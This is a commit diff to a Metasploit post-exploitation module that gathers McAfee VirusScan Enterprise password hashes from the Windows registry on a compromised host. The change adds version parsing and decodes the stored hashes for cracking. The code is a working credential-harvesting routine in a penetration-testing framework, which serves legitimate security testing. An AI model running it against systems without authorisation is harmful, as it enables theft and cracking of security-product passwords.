More cleanup

Handle multiple versions
Better print_
Actually extract

Author: jhart-r7

modules/post/windows/gather/credentials/mcafee_hashdump.rb

@@ -13,6 +13,11 @@ class Metasploit3 < Msf::Post
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::UserProfiles
 
+  VERSION_5 = Gem::Version.new('5.0')
+  VERSION_6 = Gem::Version.new('6.0')
+  VERSION_8 = Gem::Version.new('8.0')
+  VERSION_9 = Gem::Version.new('9.0')
+
   def initialize(info = {})
     super(update_info(
       info,
@@ -32,35 +37,52 @@ def initialize(info = {})
   end
 
   def enum_vse_keys
-    subkeys = []
+    vprint_status('Enumerating McAfee VSE installations')
+    keys = []
     [
       'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit
       'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit
     ].each do |key|
-      subkeys |= registry_enumkeys(key)
+      subkeys = registry_enumkeys(key)
+      keys << key unless subkeys.empty?
     end
-    subkeys.compact
+    keys
   end
 
-  def extract_hashes(keys)
+  def extract_hashes_and_versions(keys)
+    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")
+    hash_map =  {}
     keys.each do |key|
       hash = registry_getvaldata(key, "UIPEx")
       if hash.empty?
         vprint_error("No McAfee password hash found in #{key}")
-        return
+        next
       end
 
-      # Base64 decode mcafee_hash
-      mcafee_version = registry_getvaldata(key, "szProductVer")
-      if mcafee_version.split(".")[0] == "8"
-        mcafee_hash =  Rex::Text.to_hex(Rex::Text.decode_base64(mcafee_hash), "")
-        print_good("McAfee v8 password hash => #{mcafee_hash}")
-        hashtype = "dynamic_1405"
-      elsif mcafee_version.split(".")[0] == "5"
-        print_good("McAfee v5 password hash => #{mcafee_hash}")
-        hashtype = "md5u"
+      version = registry_getvaldata(key, "szProductVer")
+      if version.empty?
+        vprint_error("No McAfee version key found in #{key}")
+        next
+      end
+      hash_map[hash] = Gem::Version.new(version)
+    end
+    hash_map
+  end
+
+  def process_hashes_and_versions(hashes_and_versions)
+    hashes_and_versions.each do |hash, version|
+      if version >= VERSION_8 && version < VERSION_9
+        # Base64 decode hash
+        hash =  Rex::Text.to_hex(Rex::Text.decode_base64(hash), "")
+        print_good("McAfee v8 password hash: #{hash}")
+        hashtype = 'dynamic_1405'
+      elsif version >= VERSION_5 && version < VERSION_6
+        print_good("McAfee v5 password hash: #{hash}")
+        hashtype = 'md5u'
       else
-        print_status("Could not identify the version of McAfee - Assuming v8")
+        print_warning("Could not identify the version of McAfee - Assuming v8")
+        print_good("McAfee v8 password hash: #{hash}")
+        hashtype = 'dynamic_1405'
       end
 
       # report
@@ -77,7 +99,7 @@ def extract_hashes(keys)
         post_reference_name: refname,
         origin_type: :session,
         private_type: :password,
-        private_data: mcafee_hash,
+        private_data: hash,
         session_id: session_db_id,
         jtr_format: hashtype,
         workspace_id: myworkspace_id,
@@ -102,14 +124,19 @@ def extract_hashes(keys)
   end
 
   def run
-    print_status("Checking McAfee password hash on #{sysinfo['Computer']} ...")
+    print_status("Looking for McAfee password hashes on #{sysinfo['Computer']} ...")
 
     vse_keys = enum_vse_keys
     if vse_keys.empty?
-      print_error("McAfee Virus Scan Enterprise not installed or insufficient permissions")
+      vprint_error("McAfee Virus Scan Enterprise not installed or insufficient permissions")
       return
     end
 
-    extract_hashes(vse_keys)
+    hashes_and_versions = extract_hashes_and_versions(vse_keys)
+    if hashes_and_versions.empty?
+      vprint_error("No hashes extracted")
+      return
+    end
+    process_hashes_and_versions(hashes_and_versions)
   end
 end